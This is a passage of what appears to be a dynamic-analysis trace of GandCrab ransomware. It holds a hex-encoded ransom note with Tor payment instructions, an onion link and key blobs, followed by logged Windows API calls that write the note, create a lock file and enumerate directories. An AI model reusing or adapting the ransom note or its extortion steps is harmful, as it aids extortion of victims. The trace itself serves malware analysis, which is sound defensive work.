a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0070.370] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0070.371] CloseHandle (hObject=0x2cc) returned 1 [0070.371] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.371] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.371] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x2ac)) [0070.371] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.371] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0070.371] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0070.372] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\d2ca4a09d2ca4deb61a.lock") returned 109 [0070.372] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0070.373] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.373] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.373] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned 85 [0070.373] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*" [0070.373] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, 